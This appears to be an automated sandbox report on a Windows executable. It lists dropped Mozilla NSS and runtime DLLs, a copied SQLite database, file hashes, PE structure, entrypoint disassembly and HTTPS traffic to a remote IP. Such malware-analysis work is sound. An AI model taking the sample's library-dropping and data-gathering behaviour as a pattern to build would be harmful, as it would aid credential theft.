Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............\|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.\|..).?.H.'.\|....).?m.....h.t......\|4.%...d....

C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ2Y5TWZ\files\temp Download File
Process:	C:\Users\user\Desktop\0lm81UZm7Y.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	446464
Entropy (8bit):	0.7566157125723347
Encrypted:	false
SSDEEP:	768:PoiWBBjkoiWBBjN20olG4oNQraFB/JraFB/Q:AiQindo6QLQG
MD5:	9653810690994AC16905DC06471B8597
SHA1:	2A583B4D86270D5A0676A475ECFFE90CA570D74D
SHA-256:	E55A2047B2CA9D2F9EDC0CFE0126F5E9644D3311BC0BBA7125EF7E5BB00A2D85
SHA-512:	786D1708751189D35098E011B225FEEC6041169FB36ADE133EC0F24C81B35F8E9677A7F2CA6E4EDD8683558CF41E87BFC39217BB0C6DBDA4E54E1E513EB4A813
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll Download File
Process:	C:\Users\user\Desktop\0lm81UZm7Y.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	334288
Entropy (8bit):	6.807000203861606
Encrypted:	false
SSDEEP:	6144:C8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPowD:CbG7F35BVh8yIZqn65D
MD5:	EF2834AC4EE7D6724F255BEAF527E635
SHA1:	5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B
SHA-256:	A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
SHA-512:	C6EA0E4347CBD7EF5E80AE8C0AFDCA20EA23AC2BDD963361DFAF562A9AED58DCBC43F89DD826692A064D76C3F4B3E92361AF7B79A6D16A75D9951591AE3544D2
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....b.[.........."!.........f......)........................................p.......s....@.........................p...P............@..x....................P......0...T...............................@...............8............................text...t........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll Download File
Process:	C:\Users\user\Desktop\0lm81UZm7Y.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	137168
Entropy (8bit):	6.78390291752429
Encrypted:	false
SSDEEP:	3072:7Gyzk/x2Wp53pUzPoNpj/kVghp1qt/dXDyp4D2JJJvPhrSeTuk:6yQ2Wp53iO/kVghp12/dXDyyD2JJJvPR
MD5:	8F73C08A9660691143661BF7332C3C27
SHA1:	37FA65DD737C50FDA710FDBDE89E51374D0C204A
SHA-256:	3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
SHA-512:	0042ECF9B3571BB5EBA2DE893E8B2371DF18F7C5A589F52EE66E4BFBAA15A5B8B7CC6A155792AAA8988528C27196896D5E82E1751C998BACEA0D92395F66AD89
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...._.[.........."!.....z...................................................@.......3....@A........................@...t.......,.... ..x....................0..h.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..h....0......................@..B........................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll Download File
Process:	C:\Users\user\Desktop\0lm81UZm7Y.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	440120
Entropy (8bit):	6.652844702578311
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll Download File
Process:	C:\Users\user\Desktop\0lm81UZm7Y.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1246160
Entropy (8bit):	6.765536416094505
Encrypted:	false
SSDEEP:	24576:Sb5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRSMxkoo:4zW5ygDwnEZIYkjgWjblMSRSMqH
MD5:	BFAC4E3C5908856BA17D41EDCD455A51
SHA1:	8EEC7E888767AA9E4CCA8FF246EB2AACB9170428
SHA-256:	E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
SHA-512:	2565BAB776C4D732FFB1F9B415992A4C65B81BCD644A9A1DF1333A269E322925FC1DF4F76913463296EFD7C88EF194C3056DE2F1CA1357D7B5FE5FF0DA877A66
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.4.g.Z.g.Z.g.Z.n...s.Z..[.e.Z..B..c.Z..Y.j.Z.._.m.Z..^.l.Z.E.[.o.Z..[.d.Z.g.[..Z..^.m.Z..Z.f.Z....f.Z..X.f.Z.Richg.Z.................PE..L....b.[.........."!................w........................................@............@..................................=..T.......p........................}..p...T..............................@............................................text............................... ..`.rdata...R.......T..................@..@.data...tG...`..."...B..............@....rsrc...p............d..............@..@.reloc...}.......~...h..............@..B........................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll Download File
Process:	C:\Users\user\Desktop\0lm81UZm7Y.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144848
Entropy (8bit):	6.539750563864442
Encrypted:	false
SSDEEP:	3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
MD5:	A2EE53DE9167BF0D6C019303B7CA84E5
SHA1:	2A3C737FA1157E8483815E98B666408A18C0DB42
SHA-256:	43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
SHA-512:	45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....b.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll Download File
Process:	C:\Users\user\Desktop\0lm81UZm7Y.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\msvcp140[1].dll Download File
Process:	C:\Users\user\Desktop\0lm81UZm7Y.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	440120
Entropy (8bit):	6.652844702578311
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\vcruntime140[1].dll Download File
Process:	C:\Users\user\Desktop\0lm81UZm7Y.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\nss3[1].dll Download File
Process:	C:\Users\user\Desktop\0lm81UZm7Y.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1246160
Entropy (8bit):	6.765536416094505
Encrypted:	false
SSDEEP:	24576:Sb5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRSMxkoo:4zW5ygDwnEZIYkjgWjblMSRSMqH
MD5:	BFAC4E3C5908856BA17D41EDCD455A51
SHA1:	8EEC7E888767AA9E4CCA8FF246EB2AACB9170428
SHA-256:	E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
SHA-512:	2565BAB776C4D732FFB1F9B415992A4C65B81BCD644A9A1DF1333A269E322925FC1DF4F76913463296EFD7C88EF194C3056DE2F1CA1357D7B5FE5FF0DA877A66
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.4.g.Z.g.Z.g.Z.n...s.Z..[.e.Z..B..c.Z..Y.j.Z.._.m.Z..^.l.Z.E.[.o.Z..[.d.Z.g.[..Z..^.m.Z..Z.f.Z....f.Z..X.f.Z.Richg.Z.................PE..L....b.[.........."!................w........................................@............@..................................=..T.......p........................}..p...T..............................@............................................text............................... ..`.rdata...R.......T..................@..@.data...tG...`..."...B..............@....rsrc...p............d..............@..@.reloc...}.......~...h..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\freebl3[1].dll Download File
Process:	C:\Users\user\Desktop\0lm81UZm7Y.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	334288
Entropy (8bit):	6.807000203861606
Encrypted:	false
SSDEEP:	6144:C8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPowD:CbG7F35BVh8yIZqn65D
MD5:	EF2834AC4EE7D6724F255BEAF527E635
SHA1:	5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B
SHA-256:	A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
SHA-512:	C6EA0E4347CBD7EF5E80AE8C0AFDCA20EA23AC2BDD963361DFAF562A9AED58DCBC43F89DD826692A064D76C3F4B3E92361AF7B79A6D16A75D9951591AE3544D2
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....b.[.........."!.........f......)........................................p.......s....@.........................p...P............@..x....................P......0...T...............................@...............8............................text...t........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\mozglue[1].dll Download File
Process:	C:\Users\user\Desktop\0lm81UZm7Y.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	137168
Entropy (8bit):	6.78390291752429
Encrypted:	false
SSDEEP:	3072:7Gyzk/x2Wp53pUzPoNpj/kVghp1qt/dXDyp4D2JJJvPhrSeTuk:6yQ2Wp53iO/kVghp12/dXDyyD2JJJvPR
MD5:	8F73C08A9660691143661BF7332C3C27
SHA1:	37FA65DD737C50FDA710FDBDE89E51374D0C204A
SHA-256:	3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
SHA-512:	0042ECF9B3571BB5EBA2DE893E8B2371DF18F7C5A589F52EE66E4BFBAA15A5B8B7CC6A155792AAA8988528C27196896D5E82E1751C998BACEA0D92395F66AD89
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...._.[.........."!.....z...................................................@.......3....@A........................@...t.......,.... ..x....................0..h.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..h....0......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\softokn3[1].dll Download File
Process:	C:\Users\user\Desktop\0lm81UZm7Y.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144848
Entropy (8bit):	6.539750563864442
Encrypted:	false
SSDEEP:	3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
MD5:	A2EE53DE9167BF0D6C019303B7CA84E5
SHA1:	2A3C737FA1157E8483815E98B666408A18C0DB42
SHA-256:	43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
SHA-512:	45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....b.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.876337385377755
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Clipper DOS Executable (2020/12) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	0lm81UZm7Y.exe
File size:	589312
MD5:	14c81d7bc27bdb0d92cfff414f8ffd04
SHA1:	a1e4f8e3c26b95f96915a7258d9af11f5361d01c
SHA256:	4087eb3e978126b130b53e7477fbccec4c5502cf670594daea6176e4535169b3
SHA512:	cfae664458f2e4cb121203e032bb6c900f443078d2109567236e699d75c9465a275807be0ec08c017b45ade74be2283d8e1543dbf5397309d9deccb842102d6d
SSDEEP:	12288:avl7iDu/YedzIaqOA1yWvbFJze8mgvVnISfAqRWxwBe:E7eu/YehLqPgqFRbVfxWxwB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L....B._...

File Icon


Icon Hash:	8c8cbcccce888ae7

Static PE Info

General
Entrypoint:	0x401cf5
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x5F9B4210 [Thu Oct 29 22:28:32 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	cff62fa5d60c26268b201fcb5b9dc813

Entrypoint Preview

Instruction
call 00007F3710AB6814h
jmp 00007F3710AB394Dh
mov edi, edi
push esi
push edi
xor esi, esi
mov edi, 00489D50h
cmp dword ptr [0048800Ch+esi*8], 01h
jne 00007F3710AB3AF0h
lea eax, dword ptr [00488008h+esi*8]
mov dword ptr [eax], edi
push 00000FA0h
push dword ptr [eax]
add edi, 18h
call 00007F3710AB6887h
pop ecx
pop ecx
test eax, eax
je 00007F3710AB3ADEh
inc esi
cmp esi, 24h
jl 00007F3710AB3AA4h
xor eax, eax
inc eax
pop edi
pop esi
ret
and dword ptr [00488008h+esi*8], 00000000h
xor eax, eax
jmp 00007F3710AB3AC3h
mov edi, edi
push ebx
mov ebx, dword ptr [004840A8h]
push esi
mov esi, 00488008h
push edi
mov edi, dword ptr [esi]
test edi, edi
je 00007F3710AB3AE5h
cmp dword ptr [esi+04h], 01h
je 00007F3710AB3ADFh
push edi
call ebx
push edi
call 00007F3710AB591Bh
and dword ptr [esi], 00000000h
pop ecx
add esi, 08h
cmp esi, 00488128h
jl 00007F3710AB3AAEh
mov esi, 00488008h
pop edi
mov eax, dword ptr [esi]
test eax, eax
je 00007F3710AB3ADBh
cmp dword ptr [esi+04h], 01h
jne 00007F3710AB3AD5h
push eax
call ebx
add esi, 08h
cmp esi, 00488128h
jl 00007F3710AB3AB8h
pop esi
pop ebx
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push dword ptr [00488008h+eax*8]
call dword ptr [00484044h]
pop ebp
ret
push 0000000Ch
push 00006598h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x868cc	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10e000	0x8020	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x841d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x85420	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x84000	0x18c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x82800	0x82800	False	0.976429672534	data	7.98828575349	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x84000	0x31d2	0x3200	False	0.25265625	data	4.16016942345	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x88000	0x8557c	0x1e00	False	0.117578125	data	1.31882001666	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x10e000	0x8020	0x8200	False	0.617247596154	data	6.03737464073	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
CUGAKADOZUYELOLOCORAVUYUVOSAFI	0x113708	0x685	ASCII text, with very long lines, with no line terminators
HADEZAFELUZAGOXUCUXO	0x113d90	0x636	ASCII text, with very long lines, with no line terminators
RT_ICON	0x10e4b0	0xea8	data	English	United States
RT_ICON	0x10f358	0x8a8	data	English	United States
RT_ICON	0x10fc00	0x25a8	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x1121a8	0x10a8	data	English	United States
RT_ICON	0x113250	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_STRING	0x1145d8	0x2e4	data
RT_STRING	0x1148c0	0x15c	data
RT_STRING	0x114a20	0x4d8	data
RT_STRING	0x114ef8	0x5c8	data
RT_STRING	0x1154c0	0x304	data
RT_STRING	0x1157c8	0x324	data
RT_STRING	0x115af0	0x300	data
RT_STRING	0x115df0	0x230	data
RT_ACCELERATOR	0x1143c8	0x38	data
RT_ACCELERATOR	0x114400	0x20	data
RT_GROUP_ICON	0x1136b8	0x4c	data	English	United States
RT_VERSION	0x114420	0x1b4	data

Imports

DLL	Import
KERNEL32.dll	EndUpdateResourceW, InterlockedIncrement, GetEnvironmentStringsW, WaitForSingleObject, SetEvent, CancelDeviceWakeupRequest, FindActCtxSectionStringA, WriteFileGather, EnumResourceTypesA, GlobalAlloc, SizeofResource, SetConsoleCP, LeaveCriticalSection, GetFileAttributesW, ReadFile, GetProcAddress, FreeUserPhysicalPages, EnterCriticalSection, VerLanguageNameW, PrepareTape, RemoveDirectoryW, GetModuleFileNameA, GetModuleHandleA, FindFirstVolumeA, LocalSize, AddConsoleAliasA, FindNextVolumeA, GetSystemTime, lstrcpyW, GetLocaleInfoA, WriteConsoleW, GetCommandLineW, HeapAlloc, GetLastError, HeapReAlloc, GetCommandLineA, GetStartupInfoA, DeleteCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, GetFileType, SetFilePointer, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, LoadLibraryA, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, WriteConsoleA, GetConsoleOutputCP, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, CloseHandle, CreateFileA
USER32.dll	RealChildWindowFromPoint
GDI32.dll	GetCharWidthFloatW
ADVAPI32.dll	DeregisterEventSource, CloseEventLog

Version Infos

Description	Data
InternalName	sajbmoimizu.ise
ProductVersion	8.79.590.38
Copyright	Copyrighz (C) 2021, fudkagat
Translation	0x0129 0x00a9

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2021 10:15:02.517275095 CEST	49743	443	192.168.2.5	88.99.75.82
Sep 25, 2021 10:15:02.517328024 CEST	443	49743	88.99.75.82	192.168.2.5
Sep 25, 2021 10:15:02.517421961 CEST	49743	443	192.168.2.5	88.99.75.82
Sep 25, 2021 10:15:02.531650066 CEST	49743	443	192.168.2.5	88.99.75.82
Sep 25, 2021 10:15:02.531696081 CEST	443	49743	88.99.75.82	192.168.2.5
Sep 25, 2021 10:15:02.634445906 CEST	443	49743	88.99.75.82	192.168.2.5
Sep 25, 2021 10:15:02.634582996 CEST	49743	443	192.168.2.5	88.99.75.82
Sep 25, 2021 10:15:02.941215992 CEST	49743	443	192.168.2.5	88.99.75.82
Sep 25, 2021 10:15:02.941239119 CEST	443	49743	88.99.75.82	192.168.2.5
Sep 25, 2021 10:15:02.941749096 CEST	443	49743	88.99.75.82	192.168.2.5
Sep 25, 2021 10:15:02.941876888 CEST	49743	443	192.168.2.5	88.99.75.82
Sep 25, 2021 10:15:02.945477009 CEST	49743	443	192.168.2.5	88.99.75.82
Sep 25, 2021 10:15:02.987134933 CEST	443	49743	88.99.75.82	192.168.2.5
Sep 25, 2021 10:15:03.069340944 CEST	443	49743	88.99.75.82	192.168.2.5
Sep 25, 2021 10:15:03.069372892 CEST	443	49743	88.99.75.82	192.168.2.5
Sep 25, 2021 10:15:03.069396019 CEST	443	49743	88.99.75.82	192.168.2.5
